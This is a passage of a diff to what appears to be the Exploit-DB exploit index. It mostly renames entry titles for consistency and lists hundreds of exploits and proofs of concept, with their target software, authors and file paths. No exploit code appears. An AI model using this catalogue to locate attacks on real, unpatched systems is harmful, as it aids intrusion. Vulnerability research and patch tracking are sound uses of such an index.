Traversal",2010-12-21,waraxe,windows,remote,0 -35131,platforms/php/webapps/35131.txt,"Social Share - 'username' Parameter SQL Injection",2010-12-21,"Aliaksandr Hartsuyeu",php,webapps,0 +35131,platforms/php/webapps/35131.txt,"Social Share - ''Username'' Parameter SQL Injection",2010-12-21,"Aliaksandr Hartsuyeu",php,webapps,0 35132,platforms/linux/remote/35132.txt,"Mitel Audio and Web Conferencing (AWC) - Arbitrary Shell Command Injection",2010-12-21,"Jan Fry",linux,remote,0 35133,platforms/php/webapps/35133.txt,"Mediatricks Viva Thumbs Plugin for WordPress - Multiple Information Disclosure Vulnerabilities",2010-12-21,"Richard Brain",php,webapps,0 35134,platforms/php/webapps/35134.txt,"ImpressCMS 1.2.x - 'quicksearch_ContentContent' Parameter HTML Injection",2010-12-21,"High-Tech Bridge SA",php,webapps,0 @@ -31678,7 +31684,7 @@ id,file,description,date,author,platform,type,port 35149,platforms/php/webapps/35149.txt,"LiveZilla 3.2.0.2 - 'Track' Module 'server.php' Cross-Site Scripting",2010-12-27,"Ulisses Castro",php,webapps,0 35150,platforms/php/webapps/35150.php,"Drupal Core < 7.32 - Pre-Authentication SQL Injection",2014-11-03,"Stefan Horst",php,webapps,443 35151,platforms/hardware/remote/35151.rb,"Xerox Multifunction Printers (MFP) - 'Patch' DLM",2014-11-03,Metasploit,hardware,remote,9100 -35153,platforms/osx/dos/35153.c,"Apple Mac OS X (Mavericks) - IOBluetoothHCIUserClient Privilege Escalation",2014-11-03,"rpaleari and joystick",osx,dos,0 +35153,platforms/osx/dos/35153.c,"Apple Mac OSX (Mavericks) - IOBluetoothHCIUserClient Privilege Escalation",2014-11-03,"rpaleari and joystick",osx,dos,0 35154,platforms/asp/dos/35154.txt,"Sigma Portal - 'ShowObjectPicture.aspx' Denial of Service",2010-12-27,"Pouya Daneshmand",asp,dos,0 35155,platforms/php/webapps/35155.txt,"CruxCMS 3.0 - Multiple Input Validation Vulnerabilities",2010-12-26,ToXiC,php,webapps,0 35156,platforms/php/webapps/35156.txt,"Coppermine Photo Gallery 1.5.10 - help.php Multiple Parameter Cross-Site Scripting",2010-12-28,waraxe,php,webapps,0 @@ -31739,7 +31745,7 @@ id,file,description,date,author,platform,type,port 35219,platforms/multiple/webapps/35219.txt,"Proticaret E-Commerce Script 3.0 - SQL Injection (1)",2014-11-13,"Onur Alanbel (BGA)",multiple,webapps,0 35220,platforms/multiple/webapps/35220.txt,"Joomla HD FLV Player < 2.1.0.1 - SQL Injection",2014-11-13,"Claudio Viviani",multiple,webapps,0 35222,platforms/jsp/webapps/35222.txt,"F5 BIG-IP 10.1.0 - Directory Traversal",2014-11-13,"Anastasios Monachos",jsp,webapps,0 -35223,platforms/php/webapps/35223.txt,"Digi Online Examination System 2.0 - Unrestricted File Upload",2014-11-13,"Halil Dalabasmaz",php,webapps,80 +35223,platforms/php/webapps/35223.txt,"Digi Online Examination System 2.0 - Unrestricted Arbitrary File Upload",2014-11-13,"Halil Dalabasmaz",php,webapps,80 35224,platforms/php/webapps/35224.txt,"MyBB 1.8.x - Multiple Vulnerabilities",2014-11-13,smash,php,webapps,80 35225,platforms/windows/remote/35225.c,"Avira AntiVir Personal - Multiple Code Execution Vulnerabilities (1)",2011-01-14,D.Elser,windows,remote,0 35226,platforms/windows/remote/35226.py,"Avira AntiVir Personal - Multiple Code Execution Vulnerabilities (2)",2011-01-14,D.Elser,windows,remote,0 @@ -31796,13 +31802,13 @@ id,file,description,date,author,platform,type,port 35276,platforms/hardware/webapps/35276.txt,"ZTE ZXHN H108L - Authentication Bypass (2)",2014-11-17,"Project Zero Labs",hardware,webapps,80 35277,platforms/php/webapps/35277.txt,"WebsiteBaker 2.8.3 - Multiple Vulnerabilities",2014-11-17,"Manuel García Cárdenas",php,webapps,80 35278,platforms/php/webapps/35278.txt,"Zoph 0.9.1 - Multiple Vulnerabilities",2014-11-17,"Manuel García Cárdenas",php,webapps,80 -35279,platforms/osx/dos/35279.html,"Apple Mac OS X Safari 8.0 - Crash (PoC)",2014-11-17,w3bd3vil,osx,dos,0 +35279,platforms/osx/dos/35279.html,"Apple Mac OSX Safari 8.0 - Crash (PoC)",2014-11-17,w3bd3vil,osx,dos,0 35280,platforms/windows/remote/35280.txt,".NET Remoting Services - Remote Command Execution",2014-11-17,"James Forshaw",windows,remote,0 35294,platforms/php/webapps/35294.txt,"Joomla! 'com_clan_members' Component - 'id' Parameter SQL Injection",2011-02-01,FL0RiX,php,webapps,0 35282,platforms/android/remote/35282.rb,"Samsung Galaxy KNOX Android Browser - Remote Code Execution",2014-11-18,Metasploit,android,remote,0 35283,platforms/php/remote/35283.rb,"MantisBT XmlImportExport Plugin - PHP Code Injection",2014-11-18,Metasploit,php,remote,80 35300,platforms/php/webapps/35300.txt,"WordPress TagNinja Plugin 1.0 - 'id' Parameter Cross-Site Scripting",2011-02-01,"AutoSec Tools",php,webapps,0 -35301,platforms/php/webapps/35301.html,"Snowfox CMS 1.0 - Cross-Site Request Forgery (Add Admin) Exploit",2014-11-19,LiquidWorm,php,webapps,80 +35301,platforms/php/webapps/35301.html,"Snowfox CMS 1.0 - Cross-Site Request Forgery (Add Admin)",2014-11-19,LiquidWorm,php,webapps,80 35302,platforms/linux/dos/35302.c,"MINIX 3.3.0 - Remote TCP/IP Stack Denial of Service",2014-11-19,nitr0us,linux,dos,31337 35303,platforms/php/webapps/35303.txt,"Paid Memberships Pro 1.7.14.2 - Directory Traversal",2014-11-19,"Kacper Szurek",php,webapps,80 35304,platforms/multiple/dos/35304.txt,"Oracle Java - Floating-Point Value Denial of Service",2011-02-01,"Konstantin Preisser",multiple,dos,0 @@ -31833,7 +31839,7 @@ id,file,description,date,author,platform,type,port 35327,platforms/php/webapps/35327.txt,"CiviCRM 3.3.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-08,"AutoSec Tools",php,webapps,0 35328,platforms/php/webapps/35328.txt,"UMI CMS 2.8.1.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-08,"High-Tech Bridge SA",php,webapps,0 35329,platforms/php/webapps/35329.txt,"PHPXref 0.7 - 'nav.html' Cross-Site Scripting",2011-02-09,MustLive,php,webapps,0 -35330,platforms/php/webapps/35330.txt,"ManageEngine ADSelfService Plus 4.4 - POST Request manipulation Security Question",2011-02-10,"Core Security",php,webapps,0 +35330,platforms/php/webapps/35330.txt,"ManageEngine ADSelfService Plus 4.4 - POST Request Manipulation Security Question",2011-02-10,"Core Security",php,webapps,0 35331,platforms/php/webapps/35331.txt,"ManageEngine ADSelfService Plus 4.4 - EmployeeSearch.cc Multiple Parameter Cross-Site Scripting",2011-02-10,"Core Security",php,webapps,0 35332,platforms/php/webapps/35332.txt,"Dolphin 7.0.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-10,"AutoSec Tools",php,webapps,0 35333,platforms/php/webapps/35333.py,"webERP 4.0.1 - 'InputSerialItemsFile.php' Arbitrary File Upload",2011-02-10,"AutoSec Tools",php,webapps,0 @@ -31849,7 +31855,7 @@ id,file,description,date,author,platform,type,port 35343,platforms/php/webapps/35343.txt,"Smarty Template Engine 2.6.9 - '$smarty.template' PHP Code Injection",2011-02-09,jonieske,php,webapps,0 35344,platforms/php/webapps/35344.txt,"RobotStats 1.0 - (robot Parameter) SQL Injection",2014-11-24,"ZoRLu Bugrahan",php,webapps,0 35345,platforms/hardware/dos/35345.txt,"TP-Link TL-WR740N - Denial Of Service",2014-11-24,LiquidWorm,hardware,dos,0 -35346,platforms/php/webapps/35346.txt,"DukaPress 2.5.2 - Directory Traversal",2014-11-24,"Kacper Szurek",php,webapps,0 +35346,platforms/php/webapps/35346.txt,"DukaPress 2.5.2 - Directory Traversal",2014-11-24,"Kacper Szurek",php,webapps,0 35347,platforms/php/webapps/35347.txt,"Dokeos 1.8.6 2 - 'style' Parameter Cross-Site Scripting",2011-02-12,"AutoSec Tools",php,webapps,0 35348,platforms/php/webapps/35348.txt,"MG2 0.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-15,LiquidWorm,php,webapps,0 35349,platforms/php/webapps/35349.txt,"Gollos 2.8 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0 @@ -31857,7 +31863,7 @@ id,file,description,date,author,platform,type,port 35351,platforms/php/webapps/35351.txt,"Photopad 1.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0 35352,platforms/multiple/remote/35352.rb,"Ruby on Rails 3.0.5 - 'WEBrick::HTTPRequest' Module HTTP Header Injection",2011-02-16,"Jimmy Bandit",multiple,remote,0 35353,platforms/php/webapps/35353.txt,"Getsimple CMS 2.03 - 'admin/upload-ajax.php' Arbitrary File Upload",2011-02-15,"s3rg3770 and Chuzz",php,webapps,0 -35354,platforms/php/dos/35354.txt,"PHP 5.3.5 - 'grapheme_extract()' NULL Pointer Dereference Denial Of Service",2011-02-17,"Maksymilian Arciemowicz",php,dos,0 +35354,platforms/php/dos/35354.txt,"PHP 5.3.5 - 'grapheme_extract()' Null Pointer Dereference Denial Of Service",2011-02-17,"Maksymilian Arciemowicz",php,dos,0 35356,platforms/linux/remote/35356.rb,"Hikvision DVR - RTSP Request Remote Code Execution",2014-11-24,Metasploit,linux,remote,554 35357,platforms/cgi/webapps/35357.txt,"Advantech EKI-6340 - Command Injection",2014-11-24,"Core Security",cgi,webapps,80 35358,platforms/php/dos/35358.txt,"PHP 5.5.12 - Locale::parseLocale Memory Corruption",2014-11-24,"John Leitch",php,dos,0 @@ -31869,7 +31875,7 @@ id,file,description,date,author,platform,type,port 35365,platforms/php/webapps/35365.py,"PHPMyRecipes 1.2.2 - (dosearch.php words_exact Parameter) SQL Injection",2014-11-25,bard,php,webapps,80 35366,platforms/multiple/remote/35366.txt,"IBM Lotus Sametime - stconf.nsf Cross-Site Scripting",2011-02-21,"Dave Daly",multiple,remote,0 35367,platforms/php/webapps/35367.txt,"Crea8Social 1.3 - Persistent Cross-Site Scripting",2014-11-25,"Halil Dalabasmaz",php,webapps,80 -35369,platforms/multiple/dos/35369.txt,"Battlefield 2/2142 - Malformed Packet NULL Pointer Dereference Remote Denial Of Service",2011-02-22,"Luigi Auriemma",multiple,dos,0 +35369,platforms/multiple/dos/35369.txt,"Battlefield 2/2142 - Malformed Packet Null Pointer Dereference Remote Denial Of Service",2011-02-22,"Luigi Auriemma",multiple,dos,0 35370,platforms/linux/local/35370.c,"Linux Kernel 3.14.5 (RHEL / CentOS 7) - 'libfutex' Privilege Escalation",2014-11-25,"Kaiqu Chen",linux,local,0 35371,platforms/php/webapps/35371.txt,"WordPress Google Document Embedder 2.5.14 Plugin - SQL Injection",2014-11-25,"Kacper Szurek",php,webapps,80 35372,platforms/hardware/webapps/35372.rb,"Arris VAP2500 - Authentication Bypass",2014-11-25,HeadlessZeke,hardware,webapps,80 @@ -31877,7 +31883,7 @@ id,file,description,date,author,platform,type,port 35374,platforms/php/webapps/35374.txt,"IBM Lotus Sametime Server 8.0 - 'stcenter.nsf' Cross-Site Scripting",2011-02-22,andrew,php,webapps,0 35375,platforms/php/webapps/35375.txt,"Vanilla Forums 2.0.17.x - 'p' Parameter Cross-Site Scripting",2011-02-22,"Aung Khant",php,webapps,0 35376,platforms/php/webapps/35376.txt,"mySeatXT 0.164 - 'lang' Parameter Local File Inclusion",2011-02-16,"AutoSec Tools",php,webapps,0 -35377,platforms/windows/local/35377.rb,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax' SEH Buffer Overflow",2014-11-26,"Muhamad Fadzil Ramli",windows,local,0 +35377,platforms/windows/local/35377.rb,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax' Buffer Overflow (SEH)",2014-11-26,"Muhamad Fadzil Ramli",windows,local,0 35378,platforms/php/webapps/35378.txt,"WordPress DB Backup Plugin - Arbitrary File Download",2014-11-26,"Ashiyane Digital Security Team",php,webapps,80 35379,platforms/windows/dos/35379.go,"Elipse E3 - HTTP Denial of Service",2014-11-26,firebitsbr,windows,dos,80 35382,platforms/android/dos/35382.txt,"Android WAPPushManager - SQL Injection",2014-11-26,"Baidu X-Team",android,dos,0 @@ -31926,7 +31932,7 @@ id,file,description,date,author,platform,type,port 35429,platforms/php/webapps/35429.txt,"PhotoSmash Galleries WordPress Plugin 1.0.x - 'action' Parameter Cross-Site Scripting",2011-03-08,"High-Tech Bridge SA",php,webapps,0 35430,platforms/php/webapps/35430.txt,"1 Flash Gallery WordPress Plugin 0.2.5 - Cross-Site Scripting / SQL Injection",2011-03-08,"High-Tech Bridge SA",php,webapps,0 35431,platforms/php/webapps/35431.txt,"Ruubikcms 1.0.3 - 'head.php' Cross-Site Scripting",2011-03-08,"Khashayar Fereidani",php,webapps,0 -35432,platforms/linux/dos/35432.txt,"Wireshark 1.4.3 - NTLMSSP NULL Pointer Dereference Denial Of Service",2011-03-01,"Buildbot Builder",linux,dos,0 +35432,platforms/linux/dos/35432.txt,"Wireshark 1.4.3 - NTLMSSP Null Pointer Dereference Denial Of Service",2011-03-01,"Buildbot Builder",linux,dos,0 35433,platforms/osx/remote/35433.pl,"Apple QuickTime 7.5 - '.m3u' Remote Stack Buffer Overflow",2011-03-09,KedAns-Dz,osx,remote,0 35434,platforms/windows/remote/35434.txt,"WebKit 1.2.x - Local Webpage Cross Domain Information Disclosure",2011-03-09,"Aaron Sigel",windows,remote,0 35435,platforms/php/webapps/35435.txt,"Lazyest Gallery WordPress Plugin 1.0.26 - 'image' Parameter Cross-Site Scripting",2011-03-10,"High-Tech Bridge SA",php,webapps,0 @@ -31934,7 +31940,7 @@ id,file,description,date,author,platform,type,port 35437,platforms/multiple/dos/35437.pl,"Air Contacts Lite - HTTP Packet Denial Of Service",2011-02-09,"Rodrigo Escobar",multiple,dos,0 35438,platforms/cgi/webapps/35438.txt,"Cosmoshop 10.05.00 - Multiple Cross-Site Scripting / SQL Injection",2011-03-10,"High-Tech Bridge SA",cgi,webapps,0 35439,platforms/php/webapps/35439.txt,"WordPress Nextend Facebook Connect Plugin 1.4.59 - Cross-Site Scripting",2014-12-02,"Kacper Szurek",php,webapps,80 -35440,platforms/osx/local/35440.rb,"Apple Mac OS X - IOKit Keyboard Driver Privilege Escalation",2014-12-02,Metasploit,osx,local,0 +35440,platforms/osx/local/35440.rb,"Apple Mac OSX - IOKit Keyboard Driver Privilege Escalation",2014-12-02,Metasploit,osx,local,0 35441,platforms/multiple/remote/35441.rb,"Tincd - Post-Authentication Remote TCP Stack Buffer Overflow",2014-12-02,Metasploit,multiple,remote,655 35442,platforms/hardware/webapps/35442.txt,"EntryPass N5200 - Credentials Exposure",2014-12-02,"RedTeam Pentesting",hardware,webapps,0 35443,platforms/php/webapps/35443.txt,"TYPO3 ke DomPDF Extension - Remote Code Execution",2014-12-02,"RedTeam Pentesting",php,webapps,80 @@ -31943,7 +31949,7 @@ id,file,description,date,author,platform,type,port 35446,platforms/windows/remote/35446.pl,"Microsoft Windows Movie Maker 2.1.4026 - '.avi' Remote Buffer Overflow",2011-03-10,KedAns-Dz,windows,remote,0 35447,platforms/php/webapps/35447.txt,"Google Document Embedder 2.5.16 - mysql_real_escpae_string Bypass SQL Injection",2014-12-03,"Securely (Yoo Hee man)",php,webapps,0 35474,platforms/windows/remote/35474.py,"Microsoft Windows Kerberos - Elevation of Privilege (MS14-068)",2014-12-05,"Sylvain Monne",windows,remote,0 -35449,platforms/windows/local/35449.rb,"BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit (Ruby)",2014-12-03,"Muhamad Fadzil Ramli",windows,local,0 +35449,platforms/windows/local/35449.rb,"BulletProof FTP Client 2010 - Buffer Overflow (SEH) (Ruby)",2014-12-03,"Muhamad Fadzil Ramli",windows,local,0 35450,platforms/linux/local/35450.txt,"VFU 4.10-1.1 - Buffer Overflow",2014-12-03,"Juan Sacco",linux,local,0 35451,platforms/php/webapps/35451.txt,"BoutikOne - categorie.php path Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0 35452,platforms/php/webapps/35452.txt,"BoutikOne - list.php path Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0 @@ -31980,7 +31986,7 @@ id,file,description,date,author,platform,type,port 35485,platforms/php/dos/35485.php,"PHP < 5.3.6 'Zip' Extension - 'zip_fread()' Function Denial of Service",2011-03-10,TorokAlpar,php,dos,0 35486,platforms/php/dos/35486.php,"PHP < 5.3.6 OpenSSL Extension - openssl_encrypt Function Plaintext Data Memory Leak Denial of Service",2011-03-08,dovbysh,php,dos,0 35487,platforms/php/dos/35487.php,"PHP < 5.3.6 OpenSSL Extension - openssl_decrypt Function Ciphertext Data Memory Leak Denial of Service",2011-03-08,dovbysh,php,dos,0 -35488,platforms/osx/local/35488.c,"Apple Mac OS X 10.6.x - HFS Subsystem Information Disclosure",2011-03-21,"Dan Rosenberg",osx,local,0 +35488,platforms/osx/local/35488.c,"Apple Mac OSX 10.6.x - HFS Subsystem Information Disclosure",2011-03-21,"Dan Rosenberg",osx,local,0 35489,platforms/multiple/dos/35489.pl,"Perl 5.x - 'Perl_reg_numbered_buff_fetch()' Function Remote Denial of Service",2011-03-23,"Vladimir Perepelitsa",multiple,dos,0 35490,platforms/php/webapps/35490.txt,"IceHrm 7.1 - Multiple Vulnerabilities",2014-12-08,LiquidWorm,php,webapps,0 35492,platforms/php/webapps/35492.txt,"Free Article Submissions 1.0 - SQL Injection",2014-12-08,BarrabravaZ,php,webapps,0 @@ -31994,7 +32000,7 @@ id,file,description,date,author,platform,type,port 35500,platforms/php/webapps/35500.txt,"Family Connections 2.3.2 - 'subject' Parameter HTML Injection",2011-03-25,"Zero Science Lab",php,webapps,0 35501,platforms/multiple/remote/35501.pl,"RealPlayer 11 - '.rmp' Remote Buffer Overflow",2011-03-27,KedAns-Dz,multiple,remote,0 35502,platforms/windows/dos/35502.pl,"eXPert PDF Batch Creator 7.0.880.0 - Denial of Service",2011-03-27,KedAns-Dz,windows,dos,0 -35503,platforms/windows/local/35503.rb,"Advantech AdamView 4.30.003 - '.gni' SEH Buffer Overflow",2014-12-09,"Muhamad Fadzil Ramli",windows,local,0 +35503,platforms/windows/local/35503.rb,"Advantech AdamView 4.30.003 - '.gni' Buffer Overflow (SEH)",2014-12-09,"Muhamad Fadzil Ramli",windows,local,0 35672,platforms/jsp/webapps/35672.txt,"Cisco Unified Communications Manager 8.5 - 'xmldirectorylist.jsp' Multiple SQL Injection",2011-04-27,"Alberto Revelli",jsp,webapps,0 35673,platforms/php/webapps/35673.txt,"WordPress Daily Maui Photo Widget Plugin 0.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-04-28,"High-Tech Bridge SA",php,webapps,0 35674,platforms/php/webapps/35674.txt,"WordPress WP Photo Album Plugin 1.5.1 - 'id' Parameter Cross-Site Scripting",2011-04-28,"High-Tech Bridge SA",php,webapps,0 @@ -32024,9 +32030,9 @@ id,file,description,date,author,platform,type,port 35525,platforms/php/webapps/35525.txt,"GuppY 4.6.14 - 'lng' Parameter Multiple SQL Injection",2011-03-30,"kurdish hackers team",php,webapps,0 35526,platforms/php/webapps/35526.txt,"YaCOMAS 0.3.6 OpenCMS - Multiple Cross-Site Scripting Vulnerabilities",2011-03-30,"Pr@fesOr X",php,webapps,0 35528,platforms/php/webapps/35528.txt,"GLPI 0.85 - Blind SQL Injection",2014-12-15,"Kacper Szurek",php,webapps,0 -35529,platforms/windows/webapps/35529.txt,"Soitec SmartEnergy 1.4 - SCADA Login SQL Injection Authentication Bypass Exploit",2014-12-15,LiquidWorm,windows,webapps,0 -35530,platforms/windows/dos/35530.py,"Mediacoder 0.8.33 build 5680 - '.m3u' SEH Buffer Overflow Denial of Service",2014-12-15,s-dz,windows,dos,0 -35531,platforms/windows/dos/35531.py,"Mediacoder 0.8.33 build 5680 - SEH Buffer Overflow Denial of Service (.lst)",2014-12-15,s-dz,windows,dos,0 +35529,platforms/windows/webapps/35529.txt,"Soitec SmartEnergy 1.4 - SCADA Login SQL Injection Authentication Bypass",2014-12-15,LiquidWorm,windows,webapps,0 +35530,platforms/windows/dos/35530.py,"Mediacoder 0.8.33 build 5680 - '.m3u' Buffer Overflow (SEH) Denial of Service",2014-12-15,s-dz,windows,dos,0 +35531,platforms/windows/dos/35531.py,"Mediacoder 0.8.33 build 5680 - Buffer Overflow (SEH) Denial of Service (.lst)",2014-12-15,s-dz,windows,dos,0 35532,platforms/windows/dos/35532.py,"jaangle 0.98i.977 - Denial of Service",2014-12-15,s-dz,windows,dos,0 35533,platforms/php/webapps/35533.py,"WordPress Download Manager 2.7.4 - Remote Code Execution",2014-12-15,"Claudio Viviani",php,webapps,0 35548,platforms/php/webapps/35548.txt,"InTerra Blog Machine 1.84 - 'subject' Parameter HTML Injection",2011-03-31,"High-Tech Bridge SA",php,webapps,0 @@ -32091,7 +32097,7 @@ id,file,description,date,author,platform,type,port 35610,platforms/php/webapps/35610.txt,"Plogger 1.0 RC1 - 'gallery_name' Parameter Cross-Site Scripting",2011-04-12,"High-Tech Bridge SA",php,webapps,0 35611,platforms/php/webapps/35611.txt,"Website Baker 2.8.1 - Multiple SQL Injections",2011-04-12,"High-Tech Bridge SA",php,webapps,0 35612,platforms/windows/remote/35612.pl,"Winamp 5.6.1 - '.m3u8' Remote Buffer Overflow",2011-04-12,KedAns-Dz,windows,remote,0 -35613,platforms/multiple/dos/35613.py,"TOTVS ERP Microsiga Protheus 8/10 - Memory Corruption Denial Of Service",2011-04-13,waKKu,multiple,dos,0 +35613,platforms/multiple/dos/35613.py,"TOTVS ERP Microsiga Protheus 8/10 - Memory Corruption (Denial Of Service)",2011-04-13,waKKu,multiple,dos,0 35614,platforms/windows/remote/35614.c,"EC Software Help & Manual 5.5.1 Build 1296 - 'ijl15.dll' DLL Loading Arbitrary Code Execution",2011-04-14,LiquidWorm,windows,remote,0 35615,platforms/php/webapps/35615.txt,"PhpAlbum.net 0.4.1-14_fix06 - 'var3' Parameter Remote Command Execution",2011-04-14,"High-Tech Bridge SA",php,webapps,0 35616,platforms/php/webapps/35616.txt,"Agahi Advertisement CMS 4.0 - 'view_ad.php' SQL Injection",2011-04-15,"Sepehr Security Team",php,webapps,0 @@ -32187,12 +32193,12 @@ id,file,description,date,author,platform,type,port 35722,platforms/php/webapps/35722.txt,"Sefrengo CMS 1.6.0 - SQL Injection",2015-01-07,"Steffen Rösemann",php,webapps,80 35723,platforms/php/webapps/35723.txt,"TCExam 11.1.29 - 'tce_xml_user_results.php' Multiple SQL Injection",2011-05-01,"AutoSec Tools",php,webapps,0 35724,platforms/php/webapps/35724.txt,"EmbryoCore 1.03 - 'index.php' SQL Injection",2011-05-09,KedAns-Dz,php,webapps,0 -35725,platforms/multiple/dos/35725.pl,"Perl 5.10 - Multiple NULL Pointer Dereference Denial Of Service Vulnerabilities",2011-05-03,"Jonathan Brossard",multiple,dos,0 +35725,platforms/multiple/dos/35725.pl,"Perl 5.10 - Multiple Null Pointer Dereference Denial Of Service Vulnerabilities",2011-05-03,"Jonathan Brossard",multiple,dos,0 35726,platforms/php/webapps/35726.py,"Getsimple 3.0 - 'set' Parameter Local File Inclusion",2011-05-07,"AutoSec Tools",php,webapps,0 35727,platforms/php/webapps/35727.txt,"HOMEPIMA Design - 'filedown.php' Local File Disclosure",2011-05-09,KnocKout,php,webapps,0 35728,platforms/asp/webapps/35728.txt,"Keyfax Customer Response Management 3.2.2.6 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-09,"Richard Brain",asp,webapps,0 35729,platforms/multiple/remote/35729.txt,"Imperva SecureSphere - SQL Query Filter Security Bypass",2011-05-09,@drk1wi,multiple,remote,0 -35730,platforms/php/webapps/35730.txt,"WordPress Shopping Cart 3.0.4 Plugin - Unrestricted File Upload",2015-01-08,"Kacper Szurek",php,webapps,80 +35730,platforms/php/webapps/35730.txt,"WordPress Shopping Cart 3.0.4 Plugin - Unrestricted Arbitrary File Upload",2015-01-08,"Kacper Szurek",php,webapps,80 35731,platforms/php/remote/35731.rb,"Pandora 3.1 - Authentication Bypass / Arbitrary File Upload",2015-01-08,Metasploit,php,remote,80 35732,platforms/multiple/local/35732.py,"Ntpdc 4.2.6p3 - Local Buffer Overflow",2015-01-08,drone,multiple,local,0 35733,platforms/php/webapps/35733.txt,"vBulletin MicroCART 1.1.4 - Arbitrary File(s) Deletion / SQL Injection / Cross-Site Scripting",2015-01-09,Technidev,php,webapps,80 @@ -32204,7 +32210,7 @@ id,file,description,date,author,platform,type,port 35739,platforms/php/webapps/35739.txt,"Argyle Social - Multiple Cross-Site Scripting Vulnerabilities",2011-05-12,"High-Tech Bridge SA",php,webapps,0 35740,platforms/windows/remote/35740.txt,"Microsoft .NET Framework JIT Compiler - Optimization NULL String Remote Code Execution",2011-03-04,"Brian Mancini",windows,remote,0 35741,platforms/windows/local/35741.pl,"Palringo 2.8.1 - Stack Buffer Overflow (PoC)",2015-01-10,Mr.ALmfL9,windows,local,0 -35742,platforms/osx/local/35742.c,"Apple Mac OS X 10.9.x - sysmond XPC Privilege Escalation",2015-01-10,"Google Security Research",osx,local,0 +35742,platforms/osx/local/35742.c,"Apple Mac OSX 10.9.x - sysmond XPC Privilege Escalation",2015-01-10,"Google Security Research",osx,local,0 35743,platforms/multiple/webapps/35743.txt,"Flash Tag Cloud And MT-Cumulus Plugin - 'tagcloud' Parameter Cross-Site Scripting",2011-05-13,MustLive,multiple,webapps,0 35744,platforms/windows/remote/35744.pl,"AVS Ringtone Maker 1.6.1 - '.au' File Remote Buffer Overflow",2011-05-16,KedAns-Dz,windows,remote,0 35745,platforms/php/webapps/35745.txt,"Joomla! 'com_cbcontact' Component - 'contact_id' Parameter SQL Injection",2011-05-16,KedAns-Dz,php,webapps,0 @@ -32233,10 +32239,10 @@ id,file,description,date,author,platform,type,port 35998,platforms/php/webapps/35998.txt,"CobraScripts Trading Marketplace Script - 'cid' Parameter SQL Injection",2011-07-25,Ehsan_Hp200,php,webapps,0 35786,platforms/multiple/webapps/35786.txt,"Ansible Tower 2.0.2 - Multiple Vulnerabilities",2015-01-14,"SEC Consult",multiple,webapps,80 35770,platforms/hardware/webapps/35770.py,"Dell iDRAC IPMI 1.5 - Insufficient Session ID Randomness",2015-01-13,"Yong Chuan, Koh",hardware,webapps,623 -35771,platforms/osx/dos/35771.c,"Apple Mac OS X 10.10 - BlueTooth DispatchHCICreateConnection - Crash (PoC)",2015-01-13,"rpaleari and joystick",osx,dos,0 -35772,platforms/osx/dos/35772.c,"Apple Mac OS X 10.10 - BlueTooth BlueToothHCIChangeLocalName - Crash (PoC)",2015-01-13,"rpaleari and joystick",osx,dos,0 -35773,platforms/osx/dos/35773.c,"Apple Mac OS X 10.10 - BlueTooth TransferACLPacketToHW - Crash (PoC)",2015-01-13,"rpaleari and joystick",osx,dos,0 -35774,platforms/osx/dos/35774.c,"Apple Mac OS X 10.10 - BlueTooth DispatchHCIWriteStoredLinkKey - Crash (PoC)",2015-01-13,"rpaleari and joystick",osx,dos,0 +35771,platforms/osx/dos/35771.c,"Apple Mac OSX 10.10 - BlueTooth DispatchHCICreateConnection - Crash (PoC)",2015-01-13,"rpaleari and joystick",osx,dos,0 +35772,platforms/osx/dos/35772.c,"Apple Mac OSX 10.10 - BlueTooth BlueToothHCIChangeLocalName - Crash (PoC)",2015-01-13,"rpaleari and joystick",osx,dos,0 +35773,platforms/osx/dos/35773.c,"Apple Mac OSX 10.10 - BlueTooth TransferACLPacketToHW - Crash (PoC)",2015-01-13,"rpaleari and joystick",osx,dos,0 +35774,platforms/osx/dos/35774.c,"Apple Mac OSX 10.10 - BlueTooth DispatchHCIWriteStoredLinkKey - Crash (PoC)",2015-01-13,"rpaleari and joystick",osx,dos,0 35775,platforms/ios/webapps/35775.txt,"Foxit MobilePDF 4.4.0 iOS - Multiple Vulnerabilities",2015-01-13,Vulnerability-Lab,ios,webapps,8888 35776,platforms/java/remote/35776.rb,"Lexmark MarkVision Enterprise - Arbitrary File Upload",2015-01-13,Metasploit,java,remote,9788 35777,platforms/windows/remote/35777.rb,"Oracle MySQL for Microsoft Windows - FILE Privilege Abuse",2015-01-13,Metasploit,windows,remote,0 @@ -32272,8 +32278,8 @@ id,file,description,date,author,platform,type,port 35809,platforms/windows/remote/35809.c,"Microsoft Windows Live Messenger 14 - 'dwmapi.dll' DLL Loading Arbitrary Code Execution",2011-05-31,Kalashinkov3,windows,remote,0 35810,platforms/linux/remote/35810.txt,"libxmlInvalid 2.7.x - XPath Multiple Memory Corruption Vulnerabilities",2011-05-31,"Chris Evans",linux,remote,0 35811,platforms/windows/local/35811.txt,"Microsoft Windows < 8.1 (32/64 bit) - (User Profile Service) Privilege Escalation (MS15-003)",2015-01-18,"Google Security Research",windows,local,0 -35812,platforms/windows/local/35812.py,"T-Mobile Internet Manager - SEH Buffer Overflow",2015-01-18,metacom,windows,local,0 -35813,platforms/windows/local/35813.py,"Congstar Internet Manager - SEH Buffer Overflow",2015-01-18,metacom,windows,local,0 +35812,platforms/windows/local/35812.py,"T-Mobile Internet Manager - Buffer Overflow (SEH)",2015-01-18,metacom,windows,local,0 +35813,platforms/windows/local/35813.py,"Congstar Internet Manager - Buffer Overflow (SEH)",2015-01-18,metacom,windows,local,0 35814,platforms/php/webapps/35814.txt,"TEDE Simplificado 1.01/S2.04 - Multiple SQL Injections",2011-06-01,KnocKout,php,webapps,0 35815,platforms/php/webapps/35815.pl,"PikaCMS - Multiple Local File Disclosure Vulnerabilities",2011-06-01,KnocKout,php,webapps,0 35816,platforms/php/webapps/35816.txt,"ARSC Really Simple Chat 3.3-rc2 - Cross-Site Scripting / Multiple SQL Injection",2011-06-01,"High-Tech Bridge SA",php,webapps,0 @@ -32306,14 